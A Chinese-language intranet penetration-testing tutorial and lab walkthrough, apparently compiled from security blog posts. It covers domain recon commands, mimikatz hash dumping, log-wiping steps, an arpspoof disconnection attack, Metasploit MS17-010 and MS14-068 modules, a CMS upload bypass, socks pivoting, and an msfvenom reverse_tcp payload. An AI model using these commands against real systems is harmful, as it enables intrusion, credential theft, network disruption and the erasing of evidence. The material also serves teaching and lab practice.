目录
什么是外网渗透
什么是内网渗透
分类
工作组
域
内网渗透思路
擦除痕迹步骤
内网信息收集
内网信息收集
(1) 位置的判断
(2) 角色的判断
(3)连通性的判断
内网主机存活探测
Hash抓取
横向移动

在说内网渗透前，先说说什么是外网渗透
什么是外网渗透
外网更侧重于找漏洞寻找突破口

举个简单的例子：

把渗透测试当做去偷某家超市的某个商品。外网渗透就是突破超市的大门，进入超市。
想要进入超市，这个时候我们要寻找一下超市防守不到位的地方：比如是不是窗户没关、监控是不是半夜十二点为了备份前一天的视频内容而短暂失灵、保安是不是凌晨三点就会开始划水、大门是不是可以用万能钥匙打开……

外网渗透就是收集这些“漏洞”，综合多方因素，利用天时地利人和，突破限制，闯入超市内部。
所以，外网渗透阶段，考验的是白帽的综合能力，外网渗透的目的还是为了进入内网。
什么是内网渗透
内网更侧重于对目标的熟悉程度。
如果你突破“外网”的限制，成功进入“内网”，那么这一阶段对你的要求又有所不同。

对环境是否足够熟悉？对目标的情况是否了然于胸？是否知道哪里有摄像头？哪里有敏感信息，哪里有红外线探测，你要的商品在哪个柜台……
在重重关卡下成功拿到信息后，还要全身而退，将你留下的指纹、脚印全擦掉，不留半点痕迹。
当然，术业有专攻，作为渗透人员，或许对目标的内部不够熟悉。所以这时候你需要一个帮手——安全运维。安全运维，顾名思义，是运维，相当于超市内部的保安。他能以同行的身份，推测超市的安保情况，而且对超市内部的信息更了解。
分类
内网渗透分为域渗透和工作组渗透两类。

域渗透

1.域信息收集
2.获取域权限
3.dump域hash
4.内网权限维持

工作组渗透

1.常规内网渗透
2.各种欺骗攻击

工作组
工作组里的电脑都是平等的，是最常见最普通的资源管理模式，将不同的电脑按功能分别列入不同的组，以方便管理；相对而言，所处在同一个工作组内部成员相互交换信息的频率最高。

你可以随便加入同一网络上的任何工作组——如果你加入一个不存在的工作组，也就相当于新建一个工作组了。可以随便离开一个工作组，来去自由。“工作组”就像一个自由加入和退出的群聊一样，它本身的作用仅仅是提供一个“房间”，你只要进群，就能看到群友共享的资源。而且群里没有群主和管理员，群员之间都是平等的。
域
父域，子域：子域是相对父域来说的，一个父域有很多子域

林域：以父域为中心，有很多子域。

单域：只有一个林域
域名——dns（严格来说是一种目录服务）——域服务

域是不平等的，高级域可以操控低级域，父域可以影响子域。比如重置密码等操作。
安全组虽然名字里有安全两个字，但是实际上不太安全。
所以域就出来了，比起安全组，他多了群主(域控)、多了管理员（管理员服务器）。

域控制器中包含了由这个域的账户、密码、属于这个域的计算机等信息构成的数据库。当电脑联入网络时，域控制器首先要鉴别这台电脑是否是属于这个域的，用户使用的登录账号是否存在、密码是否正确。如果以上信息有一样不正确，那么域控制器就会拒绝这个用户从这台电脑登录。
在“域”模式下，至少有一台服务器负责每一台联入网络的电脑和用户的验证工作。称为“域控制器(Domain Controller，简写为DC)”。也就是所谓的群主。一个群可以没有管理员，但是必须有群主。
你想加入一个域，首先得要域控或者管理员服务器在域里面添加一个账号密码，然后你用管理员服务器新建的这个账号密码才能登录。也就是说你想进域，首先得管理员同意才行。
每次你登陆域，管理员都会检查账号密码对不对。不对则不许登陆。
工作组则不一样了，账号不在工作组里面？那就把这个账号添加进工作组。
域一般是大公司使用，等级深明。工作组一般是小公司用，平等自由。
内网渗透思路
1.内网环境下先查看网络架构。例如 网段信息 域控 DNS服务器 时间服务器

2.收集到了足够多的信息可以扫一下开放端口 21 22 80 8080 443等确定敏感信息，以及之后渗透的方向

3.通过以上信息进行一定的弱口令尝试，针对特定的软件做banner采集利用，snmp测试读取和写入权限

4.进行一些提权操作，从横向和纵向对目标服务器进行渗透。

5.进行敏感信息挖掘，内网密码收集嗅探，同时擦除入侵足迹。
擦除痕迹步骤
1.清相关日志

2.清日志分析服务

3.清命令行记录（历史命令）

4.清内存

5.清缓存 （可以用脚本清，然后销毁脚本）
内网信息收集




命令
作用




ipconfig /all
查询本机IP段，所在域等


net user
本机用户列表


net localgroup administrators
本机管理员[通常含有域用户]


net user /domain
查询域用户


net group /domain
查询域里面的工作组


net group “domain admins” /domain
查询域管理员用户组


net localgroup administrators /domain
登录本机的域管理员


net localgroup administrators workgroup\user001 /add
域用户添加到本机


net group “domain controllers” /domain
查看域控制器(如果有多台)


net time /domain
判断主域，主域服务器都做时间服务器


net config workstation
当前登录域


net session
查看当前会话


net use \ip\ipc$ pawword /user:username
建立IPC会话[空连接-***]


net share
查看SMB指向的路径[即共享]


net view
查询同一域内机器列表


net view \ip
查询某IP共享


net view /domain
查询域列表


net view /domain:domainname
查看workgroup域中计算机列表


net start
查看当前运行的服务


net accounts
查看本地密码策略


net accounts /domain
查看域密码策略


nbtstat –A ip
netbios 查询


netstat –an/ano/anb
网络连接查询


route print
路由表


tasklist /V
查看进程[显示对应用户]


tasklist /S ip /U domain\username /P /V
查看远程计算机进程列表


qprocess *
类似tasklist


qprocess /SERVER:IP
远程查看计算机进程列表


nslookup –qt-MX Yahoo.com
查看邮件服务器


whoami /all
查询当前用户权限等


set
查看系统环境变量


systeminfo
查看系统信息


qwinsta
查看登录情况


qwinsta /SERVER:IP
查看远程登录情况


fsutil fsinfo drives
查看所有盘符


内网信息收集
(1) 位置的判断
位置判断是指机器处于网络拓扑中的某个区域，是在DMZ区，办公网，还是核心区，核心DB等多个位置，当然这里的区域并不是绝对的，只是大概的一个环境，不同的地方网络环境不一样，区域的界限也不一定明显。
(2) 角色的判断
机器角色的判断指判断已经控制的机器是普通Web服务器、开发测试服务器、公共服务器、文件服务器还是代理服务器、DNS服务器、存储服务器等等。具体的判断是通过对机器内的主机名、文件、网络连接等多种情况进行综合判断的。
(3)连通性的判断
出口流量是否连通的判断指机器是否能上外网这些，要综合判断协议（tcp\http\dns\icmp等协议）与端口(常见能出去的端口有80,8080,443,53,110,123等)。在这里还有一种是网络内网设置了代理服务器的情况，攻击者通常会查看环境变量set，主机名是否有proxy字样的机器，注册表是否有写明代理地址或指定pac代理文件等。
内网主机存活探测
Ping

Arp

Tracert

route
Hash抓取
使用mimikatz提取系统hash与明文

破解出的NTLM可以尝试CMD5破解
横向移动
1.默认权限配置认知

当某些普通\不普通用户加入AD的rdp组或其他管理组，当攻击者拿到这些用户的权限时就相当于可以获取到域控制器的权限了。
2.端口转发与协议代理

工作组采取的一般都是常规渗透方法，因为工作组一般都是个人和少数服务器
3.工作组横向渗透
4.域环境横向渗透
5.权限维持

Linux kali内网渗透之ARP断网攻击
ARP断网攻击
如果你的kali是虚拟机 ，请将其设置为网络桥接模式，这样才和内网在同一网段
如果你的kali里没有安装arpspoof，请在终端输入如下命令进行安装
apt-get install dsniff

终端输入命令得知本机网卡编号以及内网网段



查询该网段下所有活跃IP



查询另一台相同WIFI网络下的电脑的IP地址为192.168.20.100（此地址也出现在上述查询出的活跃IP中，所以在此攻击这台电脑看看效果）
输入以下命令进行ARP断网攻击：

arpspoof -i eth0 -t 192.168.20.100 192.168.21.254

（eth0即是我们之前在kali查询出的网卡编号，192.168.20.100是受害者ip地址，192.168.21.254是受害者网关地址）

可以看的出来效果很显著

讲在前面:列举的只是部分内网渗透用到的漏洞，当然在不局限于此，根据实际情况进行发挥，同时复现不代表真实渗透环境，在文章最后，我会解释内网渗透主要利用的两个漏洞做的事情。认真看好吗弟弟！！！

MS17-010 主机漏洞，永恒之蓝

漏洞复现，关于windows主机漏洞在MSF下常用的几个成熟模块如下所示：


auxiliary/scanner/smb/smb_version

auxiliary/scanner/smb/smb_ms17_010

auxiliary/admin/smb/ms17_010_command

exploit/windows/smb/ms17_010_eternalblue

exploit/windows/smb/ms17_010_psexec


按照正常的情况来，我们优先对目标机器进行版本信息扫描以及漏洞探测，使用如下模块

扫描模块：


use auxiliary/scanner/smb/smb_version 扫描目标机器的445版本信息

use auxiliary/scanner/smb/smb_ms17_010 扫描目标机器是否存在445



MSF命令:

设置某一模块参数   set 参数名 参数内容

选择某一个模块       use  模块路径

查看当前模块设置   show options

将当前meterpreter会话放在后台     background sessions

进入当前后台某一会话              






攻击模块：


auxiliary/admin/smb/ms17_010_command

exploit/windows/smb/ms17_010_eternalblue

exploit/windows/smb/ms17_010_psexec










这里我们讲smbuser和smbpass设置了，不然会出现找不到命名管道



按照实验的情况，MS17-010对实验的Win7存在版本的要求，如果对应版本的Win7系统使用MSF的psexec模块攻击找不到命名管道，属于正常现象，解决办法是可以寻找一个帐号密码和添加管道命名（管道命名的成功概率很低，还是选找一个新的帐号密码为好）

 

MS-14-068 服务漏洞，域用户权限提升

漏洞复现：

目前公开的利用方式有博客可循的，三种方式，利用msf进行ms14-068提权。利用ms14-068.exe工具集成minikatz功能直接写入。使用MS14-068.exe加minikataz进行权限提升

使用该漏洞，实际环境要么是流量代理出来进行交互操作，要么是直接上传ms14-068.exe不进行交互操作直接拿返回结果进行操作，当然实际运用可以自行发挥。

使用MS14-068.exe操作

win7旗舰版

windows-server-2008

查看当前域用户能否直接查看域控主机盘符



minikataz查看本机内存票据，并进行清除





查看本机域用户sid



使用MS14-068工具生成该域用的高权限票据



使用minikataz将票据写入内存中



再次查看能否查看域控主机盘符



使用ms14-068.exe操作

获取指定域账户的详细信息，为伪造票据并写入做准备



根据获取的信息。对域账户进行权限提升，也就是做写入域管理权限的票据到内存的操作

 

写入失败。这里未细究是系统版本位数不对还是如何。



使用MSF进行权限提升漏洞

这是国外博客给出的利用过程，明天更新kali如何操作，并完成内网渗透-隧道代理的博客

https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit

内网渗透 | 手把手教你如何进行内网渗透

目录

内网渗透 | 手把手教你如何进行内网渗透

0x01 DMZ渗透

0x02 跳板及内网探测

0x2.1 做跳板

0x2.2 内网探测

0x03 第二层渗透

0x3.1 web渗透 or MS17_010

0x3.2 内网探测+跳板代理链

0x4 第三层内网渗透

0x5 总结

0x5.1 跳板总结

0x5.2 内网探测

0x5.3 后话

 

 

0x01 DMZ渗透

 



首页

看到DMZ开启了web服务，是一个typecho的cms，后台默认就是/admin



后台

尝试爆破



弱口令admin1234

 

但是找了一圈并没有发现有什么可以利用的,网上有一个反序列化的洞可以用。



exp



上面呢，就是利用exp将一句话写入当前目录的shellx.php中。



get shell

 

到这里呢，想了想我们的目标是内网，并且防火墙没开，就不考虑提权了。

 

0x02 跳板及内网探测

 

现在的目标是将此DMZ服务器当作跳板并探测内网的服务器。

 

0x2.1 做跳板

采用ew套接字<socks>代理，服务器上运行准备好的ew_for_linux64，本地使用proxifier配置如下：





代理规则配置如上，可以根据情况具体配置，以上是Windows端的配置，但是渗透难免会用到kali，所以kali也需要配置：



首先修改一下/etc/proxychains.conf，如下图所示：





修改完成后保存，然后就可以proxychains nmap等等。

 

至此，跳板配置基本完成。

还有一种方法是利用msf生成马儿让目标运行，反弹回来meterpreter查看路由添加路由，然后msf就可以访问内网，可以使用msf来探测以及渗透测试。

 

0x2.2 内网探测

 

这里首先有几种方法。

 

第一种，ifconfig，适用于双网卡的情况：



但是可以看到，并没有我们需要的信息。

 

第二种查看路由以及arp：



路由

 

上图是查看路由，还可以利用arp -a查看一下arp的信息，以及可以利用traceroute xxx.com查看一下路由走的路径。

 

但是看到也没有我们想要的信息，到这里我是很迷茫了，找不到内网另一个ip段，我就去问了一下环境的搭建者，他也不知道怎么找，索性就把ip段告诉了我，此处留个疑问，希望有想法的大佬联系我。

 

既然知道了ip段，就需要探测一下到底哪些主机我们可以渗透：



nmap

 

利用proxychain nmap达到nmap使用代理扫描的效果，这里需要注意的是socket代理不支持ICMP协议，所以nmap的参数应设置如上图所示，端口可以自己改。

 

可以看到10.10.1.1以及10.10.1.2的80端口都开着，那我就proxychains3 firefox打开火狐访问了一下，第一个是路由器的管理，第二个是一个cms。到这里呢，可以去猜一下路由的密码，我是直接去看了cms，因为kali中渗透web有点麻烦，所以就利用上面配置好的proxifier代理在Windows下进行渗透。

 

0x03 第二层渗透

 

0x3.1 web渗透 or MS17_010

 



UKcms



后台

 

后台默认路径/admin.php，使用了默认账号密码admin 123456

 

这个cms呢，后台可以getshell，我是被卡在burpsuite抓包上面，开了burpsuite总是无法访问，后来才发现，在burpsuite里面设置了socks代理就没必要再开proxifier了。burp配置如下：



第一种方法

 



第二种方法

 

如上配置后，就不需要再开socks代理工具了，否则会出现问题。



在后台添加php允许上传，再去上传点，不要传php因为判断了Content-Type。



 

传图片抓包改成php

 

会看到上传成功的提醒，关于路径有以下方法：





成功getshell，这是一种方法，比较麻烦。

 

前期内网探测时发现了这是台windows服务器，并且存在MS17_010漏洞，可以proxychains3 msfconsole利用msf直接打。

 

0x3.2 内网探测+跳板代理链

 

因为这是第二层内网，所以要连接webshell需要打开proxifier然后用AntSword进行连接。





双网卡

 

如上图我们知道了第三层ip段为4.4.1.x，看一下arp表：



这种基本猜测下个目标就是4.4.1.2了，但还是需要nmap探测一下，在此之前，先配置代理链。

 

还是使用earthworm进行socks代理，服务端运行后，本机配置如下：



windows



kali

配置完成后，用nmap探测一下



可以看到开了135、445、3389,啥都不说了，永恒之蓝打一波。

 

0x4 第三层内网渗透

 





这里需要注意，payload要选择正向连接的，不要反弹shell，因为我们访问得到目标而目标访问不到我们。



得到一个meterpreter shell。



read password

 

这样我们拿到了admin的密码，直接远程连接：



3389

至此呢，本次内网渗透就完成了。

 

0x5 总结

 

0x5.1 跳板总结

 

拿到DMZ的shell或权限后，可以使用ew建立socks代理，我们的windows用proxifier，我们的linux用proxychains连接，即可访问内网。如果是多层，那么proxifier提供代理链，proxychains也可以多层代理。

ew_for_linux64 -s ssocksd -l 8888
ew_for_windows.exe -s ssocksd -l 8888
ew建立ss连接。

windows下若需要burpsuite进行配合，就关掉proxifier，使用burpsuite配置socks代理，其他步骤和平常使用burp一样即可。

 

Linux下若使用burpsuite与上面同理，不要使用proxychains即可。

 

0x5.2 内网探测

 

Linux下还可以通过msf进行内网探测以及攻击：

 



步骤



 

payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=1234 -f exe -o payload.exe
反弹payload配置，正向配置rhost以及rport即可。

针对双网卡的目标：



ipconfig或ifconfig



arp

若是路由的话，可以先看一下路由，或按照上面msf的情况：



route

若是没有有效信息，可以考虑社工。

 

关于nmap：



因为ss不支持ICMP协议，所以要加如上参数，若需要其他功能则直接加就行。

 

0x5.3 后话

 

本次DMZ开启了web服务是linux服务器，第二层开了web服务是windows服务器，第三层windows服务器。

渗透过程中，首先要明确目标开了什么服务，什么操作系统等等，我们才知道如何下手。

本次渗透没有涉及域渗透，只是简单说明一下渗透流程。



 

原创投稿作者：Railgun

作者博客：www.pwn4fun.com

本文作者：HACK_Learn

本文为安全脉搏专栏作者发布，转载请注明：https://www.secpulse.com/archives/123000.html